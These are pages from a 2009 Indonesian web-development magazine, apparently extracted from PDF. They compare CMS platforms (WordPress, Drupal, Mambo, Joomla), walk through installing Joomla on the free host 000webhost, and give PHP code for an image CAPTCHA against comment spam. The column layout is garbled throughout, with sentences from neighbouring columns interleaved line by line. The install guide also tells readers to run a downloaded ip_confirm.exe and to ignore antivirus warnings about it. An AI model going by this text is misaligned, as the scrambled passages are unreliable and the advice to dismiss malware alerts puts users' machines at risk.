2. Best PHP Open Source CMS
ditemukan di search engine. belum bisa).
Kekurangan : ? WordPress dapat dijalankan di komputer
?Terlalu sederhana bagi sebagian orang dan lokal (localhost) atau di komputer tanpa
sulit untuk berkreasi. sambungan internet.
?Pluggin alias aksesoris tambahan bersifat ? Banyak pluggin tambahan.
built up, sehingga tidak bisa ditambahkan ? Template dapat dirubah-rubah sekehendak
sendiri oleh user. hati dan dapat membuat template sendiri.

18 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite
e-learning community offline version .magazine .CMS

Keunggulan : ?Template dapat dirubah-rubah sekehendak dijelaskan lebih detail tentang CMS ini sampai
?Diklaim sebagai cms terbaik saat ini dan hati dan dapat membuat template sendiri. dengan proses installasi di webserver.
mengalahkan Joomla. Kelemahan : Keunggulan :
?Digunakan oleh website yang sederhana ? Banyak pengguna Mambo yang ? Diklaim sebagai cms open source dengan
hingga website profesional. meninggalkan Mambo dan beralih ke pengguna terbanyak di dunia.
?Mudah dioperasikan “saudara” nya yaitu Joomla (termasuk saya). ? Digunakan oleh website yang sederhana
?Dapat dijalankan di komputer lokal. ?Krisis kepercayaan dunia open source. hingga website profesional.
?Banyak pluggin tambahan. ?Plugginnya terbatas, terkadang hanya ? Sering update baik dari sisi cms maupun dari
?Template dapat dirubah-rubah sekehendak disediakan untuk Joomla saja. pluggin.
hati dan dapat membuat template sendiri. ?Defaultnya tidak mendukung SEF, namun ? Mendapat kepercayaan dunia dan beberapa
?Mendukung SEF (search engine friendly) ada component pendukungnya baik yang kali menerima penghargaan menjadi cms
secara default, sehingga lebih mudah gratis maupun yang bayar, selain itu perlu open source terbaik dunia.
ditemukan di search engine. sedikit optimasi agar mendukung SEF. ? Mudah dioperasikan.
Kelemahan : ? Dapat dijalankan di komputer lokal.
?Penggunanya tidak terlalu banyak, terutama 3.Joomla! ? Banyak pluggin tambahan.
di Indonesia. Kata Joomla diambil dari sebuah kata dari ? Template dapat dirubah-rubah sekehendak
?Plugginnya tidak sebanyak Joomla. suku Swahili yaitu Jumla yang berarti hati dan dapat membuat template sendiri.
"menjadi kesatuan" bisa dikatakan memiliki ? Banyak pihak pengembang yang terus
4. Mambo kemampuan sama dengan Mambo, karena menambahkan content-content Joomla.
Mambo pada awalnya disebut Mambo Open CMS ini code awalnya Joomla! 1.0.0 Kelemahan :
Source atau MOS adalah free software atau menggunakan code Mambo 4.5.2.3. Banyak ? Defaultnya tidak mendukung SEF, namun
open source content managemen system komponen Mambo juga dapat digunakan ada component pendukungnya baik yang
yang digunakan untuk membuat dan sebagai Plugin Joomla begitu juga gratis maupun yang bayar, selain itu perlu
memanagement website melalui sebuah sebaliknya. sedikit optimasi agar mendukung SEF.
interface yang simple. Sekarang ini mambo Joomla! adalah salah satu Open Source ? Terkadang pluggin-pluggin yang didapatkan
banyak dipilih dan digunakan karena Content Management Systems paling terdapat bug atau error.
kemudahan yang diberikan untuk powerfull yang pernah ada. Digunakan ? Terkadang ada ketidaksesuaian antara cms
mengoperasikannya. diseluruh dunia dari situs yang paling dan pluggin.
Seperti hampir semua CMS yang digemari sederhana sampai kepada aplikasi korporasi
mambo memiliki kemampuan templating atau yang kompleks. Kelebihan Joomla! terletak Setiap cms di atas mempunyai kelebihan dan
kemampuan untuk mengganti tampilan pada kemudahan instalasi dan pengelolaan kekurangannya sendiri, namun saya coba
website tanpa harus melakukan nya. untuk mencocokkan antara cms dan para
upload/perubahan kontent. mambo Joomla memang sempurna untuk ukuran cms penggunanya. Berikut cms dan kecocokan
menyediakan fasilitas dan komponen- yang ada. Tak heran banyak sekali dukungan fungsinya menurut saya :
komponen seperti shopping chart yang diberikan oleh developer dan Blogspot
(menggunakan komponen virtue mart), photo programmer PHP yang turut membesarkan ? Mencoba-coba dunia blogger, cms & desain
gallery, forum, pools, calendars website aplikasi cms gratis ini. Dukungan ini diberikan website (terutama layout).
searching, multi bahasa dan lain-lain. Hampir dalam bentuk pembuatan aplikasi tambahan ? Membuat website sederhana untuk tujuan
sebagian besar website yang kami bangun (extensions and plugins), dan ribuan template tertentu.
menggunakan Mambo sebagai pilihan CMS. yang menyempurnakan Joomla. ? Menciptakan back link ke sebuah situs.
Sebuah kebanggaan bagi Indonesia karena Pada kesempatan selanjutnya akan WordPress
salah satu CoreDev Team Mambo adalah ? Mencoba-coba dunia blogger, cms & desain
orang Indonesia asli. website (terutama layout) dengan tampilan
yang lebih profesional.
Keunggulan : ? Sarana berkreasi.
?Digunakan oleh website yang sederhana ? Membuat website sederhana untuk tujuan
hingga website profesional. tertentu.
?Mudah dioperasikan. ? Menciptakan back link ke sebuah situs.
?Dapat dijalankan di komputer lokal. Drupal
?Pluggin tambahan. TampilanJoomla! ? Membuat website profesional.

.ilmuwebsite magazine | perdana 2009 19


.ilmuwebsite
.CMS .magazine e-learning community offline version

?Melatih diri menggunakan cms open source Easy managing, Easy writing, dan Easy sesuai kebutuhan. Fitur fitur tambahan itu
yang profesional. updating. Malah dibeberapa ISP/hosting yang seperti galeri photo, ramalan cuaca, kurs,
Mambo menggunakan sotware control panel seperti kalender, dan sebagainya. Kebutuhan-
?Membuat website profesional. CPANEL dan Fantastisco, Joomla sudah bisa kebutuhan akan fitur ini disediakan secara
?Melatih diri menggunakan cms open source langsung tinggal klik saja untuk installasinya. gratis oleh pendukung Joomla. Jadi jangan
yang profesional. takut. Ada ribuan orang yang sudah
?Pengenalan Mambo sebagai asal usul Joomla adalah Framework menyumbangkan fitur-fitur ini. Secara teknis
Joomla. Mau nge-blog, katanya mendingan pake istilah ini oleh Joomla disebut componnet add-
Wordpress. Kalau mau punya situs yang full on.
Mengenal joomla! Lebih dekat work yah pake Joomla. Jangan dicampur- Ada banyak ribuan component add-on yang
Sini penulis akan menjelaskan lebih aduk. Untuk skalabilitas yang lumayan besar bertebaran di dunia ini. Silakan download dan
mendalam, mengenai joomla! dan rumit, Joomla bisa mengambil peran ambil secara gratis. Namun disarankan untuk
Apaan seh Joomla! sebagai framework yang diandalkan. mencoba dulu komponen ini. Andai sudah pas
Joomla itu cara penulisannya -->Joomla! Integrasi sistemnya yang luar biasa didesain dan tidak terjadi tabrakan system. Pastikan
(dengan tanda seru di belakangnya ! :D) tapi untuk menangani kerja situs yang rumit. juga bahwa komponen add on ini sesuai
biar lebih mudah, sebut dengan Joomla saja. Bisa sih pake Wordpress untuk bikin situs dengan versi akhir Joomlanya.
Atau anda dapat memanggilnya dengan yang ber-Framework besar. Tapi mesti Joomla mendapat banyak dukungan dari para
sebutan joojoom (jujum), panggilan sayang disesuaikan juga integrasi dan fungsinya . webdesigner untuk menghadirkan web
dari cms yang satu ini. :D Kalau joomla sudah disiapkan integrasinya. Joomla menjadi begitu indah dan luar biasa.
Apa itu Joomla? Joomla berbeda dengan Mau bikin web directory sudah disiapkan API- Joomla seperti wanita yang gemulai dan
mambo, Joomla merupakan salah satu sistem nya. Malah sudah banyak developer dan cantik, namun memiliki engine yang
aplikasi manajemen situs yang terbuka alias programmer yang menyediakan mesinnya luarbiasa. Banyak template mewah dan cantik
open source CMS yang sangat hebat dan yang bisa diintegrasikan. Mau bikin situs E- bertebaran di jagat situs ini. Dari yang gratis
tercanggih di kelas CMS saat ini. Hal ini commerce juga sudah bisa diintegrasikan tis (free template) hingga yang berbayar
sesuai dengan uji pakai para pengguna CMS dengan virtue-mart. Segalanya sudah (commercial template). Googling saja dengan
yang memberikan penilaian sesuai dengan disiapkan. keyword ini ” free template Joomla” maka
kelengkapan fiturnya. Banyak para pemakai Dukungan dan Keberlanjutan Proyek bertebaran template-template gratis yang
CMS yang berpindah hati ke Joomla karena Joomla indah.
fitur-fitur yang lengkap dan canggih. Mimpi- Yang unik dari sebuah proyek Open Source Kesan
mimpi akan adanya CMS open source yang adalah adanya dukungan manusia cerdas Kesan pertama setelah mencoba Joomla,
canggih benar-benar terwujud dalam joomla. yang sukarela membaktikan dirinya untuk wow keren, mulai pada saat proses installasi
Sejarahnya joomla merupakan pecahan dari terlibat secara ikhlas menyumbangkan di server. Kita dimanja dengan grafis yang
tim inti mambo yang tergabung dalam pikiran, waktu dan dana. Joomla hingga kini sangat indah dan user friendly. Proses
kelompok yang bernama Open Source menjadi bagian dunia yang tidak terpisahkan. penginstallan mirip-mirip aplikasi desktop,
Matters (OSM). Lewat OSM inilah maka Bentuk dukungan dari orang-orang pintar di cukup dengan sedikit pengetahuan mengenai
Joomla beralih untuk meninggalkan Mambo. dunia bisa beragam. Ada yang berposisi ikut website seorang user sudah dapat melakukan
Joomla juga sudah melakukan perbaikan- dalam pemyempuranaan system. Yang installasi joomla dengan mudah.
perbaikan dari mambo, beberapa kelemahan membuat komponen pendukung (add-on) Dalam menu admin, kita juga dimanja seperti
yang sudah disempurnakan yaitu: juga banyak. Malah ada yang ikut aplikasi desktop biasa, menu-menunya
? Penyempurnaan cacat di kelas Phpmailer. menyumbangkan waktunya untuk bertanya- tertata rapi dengan grafis yang aduhai.
? Penambalan cacat di fitur aktivasi yang jawab dalam forum resmi joomla yang Kemudahan navigasi, fasilitas pengeditan
mengandung ruang terbuka untuk diserang jumlahnya ribuan orangnya. WYSIWYG (what you see is what you get).
dengan SQL injection. Komponen Pendukung Joomla (extension Seperti apa yang selalu di ucapkan oleh pak
? Penyempurnaan cacat di kelas di komponen dan plugin) Bondan, Pokoke Maknyuss ! Lihat screen
jajak pendapat (polls comment). Joomla secara default sudah bisa beroperasi shotnya. [Rikimaru]
? Penyempurnaan Mass Mailer yg terbuka maksimum untuk menjadi sebuah web yang
bagi spam. handal. Ketersediaan fasilitas dan fitur untuk
sebuah web yang canggih sudah terpenuhi.
Bagi pemula atau awan (newbie) Joomla Namun kadang kala ada juga keinginan-
didesain untuk 4E, yaitu Easy installation, keinginan untuk menambahkan fitur lain

20 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite
e-learning community offline version .magazine .CMS

Langkah Mudah
Installasi Joomla!
Bagaimana cara melakukan konfigurasi yang umum digunakan pada
instalasi joomla, dan menjelaskan tahapan pada instalasi joomla.

Untuk tutorial kali ini penulis akan coba adalah mendownload file Joomla terlebih My account jika sudah selesai. Perlu dicatat,
menjelaskan bagaimana melakukan installasi dahulu tentunya, joomla bisa didapatkan di
joomla!
Dimanakah kita akan menjalankan joomla? http://www.joomla.org/download.html, pada
Joomla adalah CMS yang berjalan dalam saat ini versi terakhir dari Joomla adalah 1.5
sistem PHP dan MySQL yang menggunakan (Joomla_1.5.8-Stable-Full_Package.zip).
mesin server Apache server. Berikut ini adalah
kelengkapan yang harus tersedia :
2. Daftar domain dan hosting
? PHP 4.2.x (http://www.php.net)
? MySQL 3.23.x (http://www.mysql.com) Ya, seperti yang telah dijelaskan sebelumnya,
? Apache 1.13.19 (http://www.apache.org) tutorial kali ini sengaja menggunakan
Ketiga hal di atas terkenal dengan istilah webhosting gratis sebagai simulasi, untuk Tampilan daftar hosting
LAMP (Linux, Apache, MySQL dan PHP) melakukan uji apakah proses joomla yang
untuk pemakaian di sistem operasi Windows. dilakukan benar-benar berhasil dan layak Dalam mengisi password, 000webhost
untuk digunakan selanjutnya. Web hosing mengharuskan adanya kombinasi angka dan
Ada dua cara untuk menjalankan Joomla,
yaitu di server local (localhost di pc yang free, alias tidak berbayar yang saat ini huruf, jangan mengisi password dengan
desktop/user) atau di server Hosting. Untuk memiliki kualitas yang cukup memenuhi angka saja, atau huruf saja, usahakan untuk
menjalankan joomla pada localhost itu adalah 000webhost.com. menggabungkan keduanya, dan memiliki
bergantung dari jenis sistem operasi yang lebih dari 6 digit.
Untuk menggunakan fasilitas webhosting
digunakan, entah itu sistem operasi Windows
atau Linux. Untuk Linux, joomla dapat 000webhost anda dapat mencobanya dengan
langsung dijalankan secara otomatis, karena melakukan registrasi terlebih dahulu di Di sini penulis telah berhasil melakukan
di dalamnya sudah terdapat webserver ( situsnya (http://000webhost.com), dengan proses awal untuk mendaftar dengan domain
apache ) yang tentunya sudah mendukung cara melakukan klik sign up yang terletak di belajar-joomla.net84.net. Jika berhasil dan
bahasa pemrogaman php. Namun bagi tidak ada masalah seperti domain tidak
samping kanan.
sistem operasi Windows, diharuskan untuk
menginstal LAMP terlebih dahulu. Saya
merekomendasikan menggunakan
ApacheFriends XAMPP. Dengan XAMPP kita
tidak perlu lagi meng-instal satu-persatu
komponen yang saya sebutkan sebelumnya,
semua komponen yang diperlukan sudah
dibundle dalam satu paket XAMPP.
Pada kali ini kita akan mencoba melakukan
instalasi di server hosting gratisan
000webhost (http://000webhost.com) yang
tentu saja sudah mendukung semua Tampilan 000webhost.com Tampilan halaman aktivasi
komponen-komponen di atas.
Bagaimanakah Joomla bisa berfungsi dengan Langkah berikutnya adalah mengikuti
instruksi yang selanjutnya, cukup sederhana tersedia, dll, anda akan dibawa secara
baik? Untuk itu pastikan anda menggunakan
browser internet yang umum digunakan, dan mudah di mengerti. Otomatis untuk masuk ke dalam halaman
seperti Internet Explorer (version 5.5+), untuk nama domain, isikan text inputan yang aktivasi, sistem aktivasi di sini yaitu
Netscape, Opera ataupun Mozilla Firefox. memasukan 6 digit confirmation code yang
terletak di bawah label “recommended i'lI will
chose your free domain”. Isikan nama situs dikirim melalui ip_confirm.exe, yaitu sebuah
1. Download Joomla
yang diinginkan, setelah itu lengkapi nama, aplikasi kecil yang akan meng-generate kode
Langkah awal untuk menginstallasi joomla
email, dan password. Lalu klik tombol create aktivasi, tinggal klik ip_confirm.exe untuk

.ilmuwebsite magazine | perdana 2009 21


.ilmuwebsite
.CMS .magazine e-learning community offline version

mendownloadnya. Jika antivirus anda salah Setelah itu akan muncul informasi detil
deteksi, yakni menganggap ip_confirm.exe
sebagai virus, ignore saja. Jalankan file
ip_confirm.exe, lalu masukan 6 digit kode tadi
ke tempat yang telah disediakan

Apabila telah berhasil, langkah selanjutnya


adalah masuk Control panel (Cpanel) untuk
Tampilan file manager
Tampilan informasi data mysql
Setelah masuk ke direktori public_html,
Mengenai data mysql yang baru saja dibuat. lakukan upload dengan cara mengklik button
Data-data ini harus dicatat, karena akan upload.
digunakan pada proses instalasi Joomla
nantinya.

Tampilan Cpanel 4. Upload file Joomla


konfigurasi situs. Ada beberapa cara untuk melakukan upload
t file ke webhosting, biasanya menggunakan
3. Create MySQL user aplikasi ftp seperti filezilla, atau
Kita harus membuat MySQL user dan memanfaatkan fasilitas yang sudah tersedia
database terlebih dahulu, user ini nantinya di Cpanel, yaitu file manager berbasis web
Tampilan di direktori public_html
akan digunakan dalam proses installasi (net2ftp).
Joomla nanti. Agar lebih mudah, penulis akan coba jelaskan Anda akan masuk ke dalam halaman “upload
bagaimana melakukan upload menggunakan files and archieve” seperti tampak pada
Untuk membuat user silahkan pilih menu net2ftp, file manager berbasis web. gambar dibawah ini,
MySQL pada Cpanel. Untuk melakukan file cms Joomla, pada Karena file Joomla berbentuk zip/archieve

Tampilan menu mysql Tampilan menu file manager Tampilan upload files and archieve

Setelah itu akan masuk ke halaman “manage halaman CPanel pilih menu File manager kita dapat memanfaatkan form yang ada di
MySQL database”, isikan nama databasenya, pada tab >>files, sebelah kanan. Yakni, Archieves(Zip, tar,
nama user, dan password, klik create tgz, gz). Klik button browse lalu cari file yang
database untuk konfirmasi. Dengan fasilitas file manager ini, user dapat akan kita upload.
memanage seperti melakukan upload,
membuat file, membuat folder, hapus file-file Berhubung kapasitas/size dari file yang dapat
yang ada di situsnya, dan lain sebagainya. diupload itu maksimal 5mb sedangkan file
Agar joomla dapat diakses dari luar, contoh : Joomla.zip yang telah di download adalah
http://belajar-joomla.net84.net, joomla perlu sebesar 5,9Mb, maka file zip tersebut harus di
diupload kedalam direktori public_html. Untuk pecah terlebih dulu menjadi beberapa bagian,
dapat masuk ke direktori public_html, lakukan caranya adalah dengan melakukan ekstrak
klik pada icon folder public_html, klik pada file Joomla.zip, kemudian lakukan kembali
filemanager ini tidak berbeda jauh dengan pembuatan file zip dari file joomla yang telah
Tampilan mysql menggunakan explorer di windows, / di linux. diekstrak, di sini saya membaginya menjadi 5

22 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite
e-learning community offline version .magazine .CMS

bagian, jadi ada 5 file archieve (zip) yang akan yang dibutuhkan dalam proses installasi
di upload. joomla. Selain itu joomla juga server database MySQL, secara default
Jika sudah selesai, lakukan klik gambar merekomendasikan sistem apa dan biasanya bernama localhost, tapi berhubung
centang hijau di pojok kiri atas untuk langsung konfigurasi bagaimana yang harus kita melalui webhosting jadi diisikan sesuai
melakukan upload. digunakan dalam memaksimalkan masalah dengan yang tadi kita buat di mySQL user,
Penulis sarankan untuk menguploadnya satu keamanan. Terakhir adalah pemberitahuan yaitu:
persatu, jangan dilangsungkan sekaligus, permissions atau hak akses atas file dan Contoh : Mysql3.000webhost.com
karena prosesnya akan jadi lebih lama direktori, untuk sistem berbasis linux (unix).
dibandingkan dengan melakukan upload satu Di lingkungan opersi windows, tidak ada
persatu file zip tersebut. Apabila berhasil akan konfigurasi permissions. Yang ada hanyalah
muncul informasi berisi nama-nama file yang writeable ataukah tidak suatu file. Klik tombol
baru saja diupload. NEXT, akan muncul halaman selanjutnya :
(gambar upload), ulangi lagi tahapan yang
baru saja dilakukan untuk file zip yang lainnya.

Joomla! Installation Tampilan mysql


Step 1: Language
Setelah semua file selesai diupload, langkah ? Username
selanjutnya adalah membuka domain website Adalah username yang tadi telah buat pada
yang telah dibuat dengan menggunakan fasilitas mysql user.
browser internet, sebagai contoh untuk ? Password
Step 2
mengakses belajar-joomla.net84.net, lakukan Ini merupakan password yang harus diisi demi
a k s e s d e n g a n h t t p : / / w w w. b e l a j a r - Terrnyata configuration.php writeable-nya menjaga keamanan database. Silakan isikan
joomla.net84.net , atau cukup dengan tidak tersedia, tidak apa-apa, dilangkah password sesuai dengan yang telah dibuat
belajar-joomla.net84.net. terakhir nanti kita akan coba membuatnya sebelumnya.
Tampilan awal dari joomla installation adalah secara manual. ? Database name
seperti ini : Isikan database yang telah ada untuk
Step 3: License menampung data
Halaman ini menjelaskan soal lisensi Joomla,
isinya seputar hak yang dimiliki oleh Joomla
dan user dalam lingkungan open source
software.

Step 1 Step 4

Step satu ini digunakan untuk menentukan NEXT jika sudah selesai. Akan muncul
bahasa apa yang akan digunakan untuk halaman berikutnya, step 5, yakni ftp
proses installasi Joomla nantinya, defaultnya Step 3 configuration, Berhubung ftp configuration di
adalah bahasa inggris(US). cpanel 000webhost.com belum dibuat anda
Klik NEXT untuk melanjutkan. Klik tombol NEXT untuk memasuki halaman bisa langsung melewatkannya saja, karena ini
step 4. dapat dilakukan diluar proses installasi
Step 2: Pre-installation Check joomla, selanjutnya adalah step 6.
Langkah yang kedua ini menampilkan Step 4: Database Configuration.
halaman keterangan konfigurasi dan fasilitas Di sini kita diminta untuk mengisikan
server apache, MySQL, dan konfigurasi php konfigurasi database MySQL. Berikut ini Step 6: Configuration
yang ada. Apabila ada komponen yang tidak adalah konfigurasi yang harus diisi yaitu: Pada langkah ini terdapat satu halaman Main
tersedia, maka joomla langsung memberikan ?Database type Pastinya MySQL Configuration, penjelasannya adalah sebagai
warning berisi pemberitahuan informasi apa ?Host NameIni adalah nama dari host name berikut :

.ilmuwebsite magazine | perdana 2009 23


.ilmuwebsite
.CMS .magazine e-learning community offline version

? Site name joomla…


Untuk memberi nama pada situs Joomla Defaultnya, joomla memberikan sebuah
anda. Biasanya implementasinya langsung username administrator dengan id admin.
ke pada title dari site tersebut. Perlu diperhatikan joomla memberi
? Confirm the Admin Email and Password. peringatan, mengharuskan untuk menghapus
Pengisian email berguna untuk folder installation yang telah pada direktori
pemberitahuan akan password, user root dari joomla. Caranya? Ya lewat file
registered, dan perubahan lainnya yang akan manager tadi. Berikan tanda centang di
diberitahukan melalui email, karena kita sebelah folder installation kemudian klik Front page
menginstall Joomla di webhost server, maka delete pada menu atas.
hal ini penting sebagai sarana komunikasi. Perlu dicatat, untuk masuk ke dalam halaman
Pastikan anda mengisikan password dengan admin anda tinggal memasukkan alamat site-
benar dan tepat, password ini akan digunakan nya kemudian menambahkan
untuk membuka halaman login administrator. “/administrator”, contoh : http://belajar-
? Load sample data joomla.net84.net/administrator.
Fasilitas ini digunakan untuk sarana belajar
dan cek bagi pemula. Bila fasilitas ini
diaktifkan maka user bisa melihat hasil
installasi joomla dengan cepat, sehingga bisa
melihat hasilnya. Bagi pemula yang baru Delete folder
pertama kali menginstall disarankan untuk
menginstall fasilitas ini dengan cara mengklik Masih terdapat satu masalah lagi, lihat tulisan
tombol install sample data di bagian bawah. di pojok kanan bawah, ternyata file
configuration'nya tidak bisa writeable, jadi kita
harus membuat file configuration.php secara Login administrator
manual. Scriptnya sudah di sediakan
dibawahnya, anda tinggal mengcopynya Seperti inilah halaman untuk login sebagai
kemudian pastekan ke dalam file bernama user ataupun administrator, anda diharuskan
configuration.php. Caranya sama seperti tadi, untuk memasukan username dan password.
menggunakan file manager. Dalam direktori Bila berhasil login kita akan memasuki
public_htm klik menu 'new file' kemudian halaman utama administrator Joomla.
paste script yang telah dicopy. Lalu beri nama
Step 6 configuration.php, simpan file tersebut
dengan melakukan klik pada icon/gambar
Isi form inputan tersebut kemudian klik next disket.
untuk melanjutkan proses installasi
Ya, sampai sini proses installasi joomla telah
Step 7: Finish sepenuhnya selesai dilakukan. Untuk dapat
Tahapan ini merupakan langkah akhir, jika melihat site yang baru saja dibuat, silahkan
sukses maka Joomla akan mengucapkan klik button site, sedangkan button admin
Selamat Anda telah berhasil menginstallasi digunakan untuk masuk ke dalam halaman Halaman utama administrator Joomla.
administrator. Sekarang anda dapat mencoba
test drive site yang telah dibuat, sebagai Yah selamat kita sudah bukan blogger lagi,
contoh, http://belajar-joomla.net84.net tapi Joomlaer :D [Rikimaru]
Ya kira-kira beginilah tampilan default Joomla
yang telah dibuat buat. Masih menggunakan
template bawaan. Tapi penulis rasa cukup

Memuaskan, dan enak dipandang. Serta


Step7 tampilan yang sederhana tetapi tetap elegan.

24 .ilmuwebsite magazine | perdana 2009


.ilmuwebsite e-learning community offline version
.web security .magazine
Bot Filter dengan
Captcha, jadikan site
27 anda hanya untuk
manusia saja

Bot Filter, dengan Captcha


jadikan website anda
hanya untuk manusia saja
Pernahkan anda mendapatkan fasilitas komentar pada situs anda berisi banyak sekali spamming?
Penuh dengan kalimat-kalimat iklan suatu barang atau jasa tertentu lengkap dengan link terkait ?!

T
idak jadi soal jika komentar-komentar paling baik adalah menggunakan captcha.
yang berisi iklan nggak jelas itu cuma Captcha sendiri merupakan security code yang
belasan komentar saja, tapi apa jadinya harus di isi secara manual oleh user, hal seperti ini
jika iklan tersebut berjumlah puluhan bahkan diimplementasikan ketika user melakukan
.web security

ratusan? :D Kesal memang. registrasi akun, mengisi komentar, guestbook,


Biasanya kegiatan menyampah atau shoutz box atau login kedalam suatu web service.
memasukkan iklan kedalam fasilitas komentar ini Ada beberapa jenis captcha yang biasanya
dilakukan sebagai alasan internet marketing, digunakan oleh sebagian besar situs,
dengan cara menyebarkan link mereka kedalam diantaranya, Text Images Captcha, Audio
fasilitas komentar. Para spamming ini cenderung Captcha, dan Cognitive Captcha. Saat ini penulis
tetap menyukai menggunakan fasilitas komentar hanya akan menjelaskan bagaimana membuat
maupun guestbook yang ada pada site-site Text Images Captcha, di lain kesempatan akan
tertentu yang dianggap berpotensi sebagai alat penulis jabarkan captcha bentuk lain.
marketing mereka, walaupun telah banyak
disediakan site directory ( situs khusus yang Apa itu Text Images Captcha ?
menangani pengklasifikasian situs berdasarkan
suatu kategori tertentu ) dari yang gratis hingga
yang berbayar sekalipun, mungkin alasannya
adalah lebih efisien. Dan tentunya hal seperti ini
tidak dilakukan secara manual dengan melakukan
ketik mengetik di atas tuts keyboard. Ketika akan melakukan registrasi sebuah
Para spamming yang profesional biasanya akun, atau kondisi lain ketika akan mengisi
menggunakan suatu aplikasi khusus tertentu, komentar, ketika user akan melakukan login ke
bahkan merancang aplikasi sendiri, aplikasi dalam akunnya, sering ditemui satu peringatan
seperti ini biasanya disusun menggunakan suatu untuk mengisi kode keamanan atau security code
bahasa server side scripting yang cenderung yang dihasilkan dari sebuah gambar berisi text,
mudah dipahami, dan pembuatan aplikasi seperti dan hal tersebut harus dilakukan sebelum
ini terbilang sangatlah mudah, dengan logika yang melakukan klik pada button submit. Inilah yang
sederhana aplikasi seperti ini dapat secara dimaksud dengan Text Images Captcha. Captcha
otomatis memasukkan banyak komentar pada jenis ini biasanya memanfaatkan session dan
banyak situs sekaligus secara bersamaan. library gd pada php. Jadi ketika halaman diload,
Dalam artikel ini penulis tidak akan maka secara random sebuah text akan dihasilkan,
menjelaskan bagaimana kegiatan spamming dan text itu diregistrasikan sebagai sebuah
dilakukan, tapi di artikel ini penulis coba berikan session, kemudian dimasukkan ke dalam sebuah
solusi untuk meminimalisir proses spamming image yang dibuat oleh library gd, sehingga ketika
terjadi. Pertanyaannya adalah, bagaimana user mengetik kembali text yang ada dalam image
mencegah adanya kegiatan spamming? Ada tersebut, maka akan menghasilkan sebuah
beberapa solusi yang dapat digunakan, yang variable POST, variable ini ada ketika user

25 .ilmuwebsite magazine | perdana 2009


e-learning community offline version .ilmuwebsite .web security
.magazine

mengklik button submit, dan selanjutnya variable POST tersebut di


cocokkan dengan text yang telah diregistrasikan sebagai sebuah if (count($fonts) < 1) {
session tadi. Jika cocok maka barisan code selanjutnya akan die("No fonts found!");
}
dijalankan. Jika tidak, maka user akan dipersilahkan untuk kembali
mengisi codenya secara benar. header("Content-Type: image/jpeg");

Untuk mengimplementasikan Text Images Captcha, setidaknya header("Expires: Mon, 01 Jul 1998 05:00:00 GMT");
membutuhkan 3 File. Antara lain : header("Last-Modified: " . gmdate("D, d M Y H:i:s") .
" GMT");
header("Cache-Control: no-store, no-cache, must-
font : Font yang digunakan sebagai tampilan untuk captcha.
? revalidate");
captcha_image.php : Script tersebut menghasilkan Text
? header("Cache-Control: post-check=0, pre-
Images Captcha check=0", false);
header("Pragma: no-cache");
index.php : Script untuk mengimplementasikan captcha.
?

Font dapat diletakan satu direktori dengan script $img = imagecreatetruecolor($width, $height);
captcha_image.php dan index.php, namun bisa juga diletakan pada
$bg = imagecolorallocate($img, rand(210,255),
direktori yang berbeda. Itu semua bergantung keinginan anda, rand(210,255), rand(210,255));
tentunya dengan sedikit settingan yang berbeda. Selanjutnya file imagefilledrectangle($img, 0, 0, $width, $height,
lengkap captcha_images.php: $bg);

$right = rand(10, 30);


<?php $left = 0;
/* captcha_image.php */ while ($left < $width) {
$poly_points = array(
/* panjang text security code */ $left, 0,
$pass_length = 4; $right, 0,
rand($right-25, $right+25), $height,
/* dimensi image */ rand($left-15, $left+15), $height);
$width = 200;
$height = 60; $c = imagecolorallocate($img, rand(210,255),
rand(210,255), rand(210,255));
/* letak fontnya */ imagefilledpolygon($img, $poly_points, 4, $c);
$font_path = dirname(__FILE__);
session_start(); $random_amount = rand(10, 30);
$left += $random_amount;
/* susun textnya secara random */ $right += $random_amount;
$passwd = ""; }
$i = 0;
while ($i < $pass_length) { $c_min = rand(120, 185);
$passwd .= chr(rand(97, 122)); $c_max = rand(195, 280);
$i++;
} $left = 0;
/* simpan text kedalam session */ while ($left < $width) {
$_SESSION["tt_pass"] = $passwd; $right = $left + rand(3, 7);
$offset = rand(-3, 3);
$fonts = array();
$line_points = array(
if ($handle = opendir($font_path)) { $left, 0,
while (false !== ($file = readdir($handle))) { $right, 0,
$right + $offset, $height,
if (substr(strtolower($file), -4, 4) == '.ttf') { $left + $offset, $height);
$fonts[] = $font_path . '/' . $file;
} $pc = imagecolorallocate($img, rand($c_min,
} $c_max),
}

.ilmuwebsite magazine | perdana 2009 26


.ilmuwebsite e-learning community offline version
.web security .magazine

Kemudian untuk mengimplementasikan script tersebut, maka


rand($c_min, $c_max),
buat sebuah file bernama index.php, letakan satu direktori dengan
rand($c_min, $c_max));
imagefilledpolygon($img, $line_points, 4, $pc); script diatas. Script lengkapnya :

<?php
$left += rand(20, 60);
}
session_start();
$top = 0;
if ($_REQUEST["tt_pass"]) {
while ($top < $height) {
if ($_REQUEST["tt_pass"] ==
$bottom = $top + rand(1, 4);
$_SESSION["tt_pass"]) {
$offset = rand(-6, 6);
echo "Codenya benar.";
} else {
$line_points = array(
echo "Codenya Salah.";
0, $top,
}
0, $bottom,
exit(0);
$width, $bottom + $offset,
}
$width, $top + $offset);
$pc = imagecolorallocate($img, rand($c_min,
print '<form action="' . $_SERVER['PHP_SELF'] . '"
$c_max),
method="post">';
rand($c_min, $c_max),
?>
rand($c_min, $c_max));
imagefilledpolygon($img, $line_points, 4, $pc);
Masukkan security code dengan benar:<br />
$top += rand(8, 15);
(Refresh halaman ini kalo security code nggak
}
kebaca)<br />
<img src="captcha_image.php"><br /><br />
$spacing = $width / (strlen($passwd)+2);
Security Code: <input name="tt_pass" type="text"
size="10" maxlength="10">
<input type="submit">
$x = $spacing;
</form>
$pc = imagecolorallocate($img, rand($c_min,
for ($i = 0; $i < strlen($passwd); $i++) {
$c_max),
$letter = $passwd[$i];
$size = rand($height/3, $height/2);
$rotation = rand(-30, 30);

$y = rand($height * .90, $height - $size - 4); Letakkan ketiga file tersebut, yakni : captcha_image.php,
index.php, dan times.ttf ke dalam direktori C:\Program
$font = $fonts[array_rand($fonts)];
Files\xampp\htdocs\ web.security, setelah itu jalankan xamppnya,
$r = rand(100, 255); $g = rand(100, 255); jalankan browser Internetnya, masukkan alamat
$b = rand(100, 255); http://localhost/web.security/index.php, dan lihat hasilnya.

$color = imagecolorallocate($img, $r, $g,


$b);
$shadow = imagecolorallocate($img, $r/3,
$g/3, $b/3);
imagettftext($img, $size, $rotation, $x, $y,
$shadow, $font, $letter);
imagettftext($img, $size, $rotation, $x-1, $y-3,
$color, $font, $letter);

$x += rand($spacing, $spacing * 1.5);


